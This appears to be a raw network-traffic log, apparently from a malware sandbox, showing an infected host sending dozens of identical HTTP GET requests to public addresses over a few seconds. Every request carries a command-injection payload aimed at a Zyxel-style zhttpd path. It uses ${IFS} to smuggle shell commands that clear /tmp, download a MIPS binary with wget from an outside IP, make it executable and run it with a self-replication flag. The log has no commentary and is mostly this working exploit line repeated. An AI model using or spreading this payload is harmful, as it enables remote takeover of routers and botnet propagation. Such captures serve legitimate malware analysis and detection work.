                                                            Jan 28, 2024 10:12:15.481497049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            365192.168.2.134572237.99.125.42443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481503963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            366192.168.2.133444689.210.165.246443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481544971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            367192.168.2.135869247.228.251.48443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481591940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            368192.168.2.1335176202.5.2.128443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481611967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            369192.168.2.1349388199.122.225.154443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481653929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            370192.168.2.1333016109.20.223.252443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481699944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            371192.168.2.1343938182.104.233.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481751919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            372192.168.2.1345338148.129.4.173443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481801987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            373192.168.2.1350052145.35.112.54443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481822968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            374192.168.2.133397258.145.199.204443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481852055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            375192.168.2.1350240131.28.92.178443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481894970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            376192.168.2.1344706216.225.236.72443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481929064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            377192.168.2.1357470107.26.5.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.481955051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            378192.168.2.1352344208.24.198.227443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482009888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            379192.168.2.1338230157.143.31.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482050896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            380192.168.2.134829676.235.26.81443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482093096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            381192.168.2.1358898199.50.23.32443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482135057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            382192.168.2.1333106138.7.167.167443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482142925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            383192.168.2.13351281.204.254.232443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482209921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            384192.168.2.135018238.214.0.145443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482251883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            385192.168.2.1341970208.138.176.42443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482309103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            386192.168.2.1337272119.28.106.73443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482338905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            387192.168.2.1350630186.71.151.253443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482400894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            388192.168.2.134804048.76.215.110443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482430935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            389192.168.2.1334290148.209.149.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482441902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            390192.168.2.135245648.97.210.216443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482666969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            391192.168.2.1358282207.91.41.47443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482697964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            392192.168.2.135191419.98.145.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482700109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            393192.168.2.1342042136.147.177.125443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482700109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            394192.168.2.135670665.143.22.165443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482727051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            395192.168.2.1345756180.82.220.227443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482733965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            396192.168.2.134354619.170.203.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482734919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            397192.168.2.1342914179.226.235.232443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482750893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            398192.168.2.133814020.156.240.43443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482775927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            399192.168.2.134816469.21.23.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482800007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            400192.168.2.135039096.205.70.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:15.482887030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            401192.168.2.1353832173.251.70.197443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:16.489135027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            402192.168.2.1358408174.55.254.154443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:16.489165068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            403192.168.2.1345512157.84.91.41443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493335962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            404192.168.2.133599237.46.239.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493366957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            405192.168.2.1359464157.95.25.177443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493387938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            406192.168.2.135417413.12.245.71443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493428946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            407192.168.2.1350034147.126.104.191443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493493080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            408192.168.2.1349560184.114.52.250443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493499994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            409192.168.2.133351889.28.54.232443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493558884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            410192.168.2.134375877.212.88.46443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493582010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            411192.168.2.1346752183.230.147.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493624926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            412192.168.2.135883249.69.242.85443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493653059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            413192.168.2.133871634.105.153.45443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493700981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            414192.168.2.1352454138.51.128.173443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493722916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            415192.168.2.1348564208.43.204.189443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493771076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            416192.168.2.135239495.162.177.250443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493776083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            417192.168.2.1336674131.219.188.164443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493823051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            418192.168.2.1337688180.151.101.191443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493849039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            419192.168.2.1339722102.157.114.104443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493895054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            420192.168.2.133746024.8.250.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493910074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            421192.168.2.1360594135.92.218.26443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493952036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            422192.168.2.1348278113.61.213.109443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:17.493984938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            423192.168.2.1339440190.225.122.53443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498207092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            424192.168.2.1336908139.191.55.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498248100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            425192.168.2.134656262.71.138.176443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498271942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
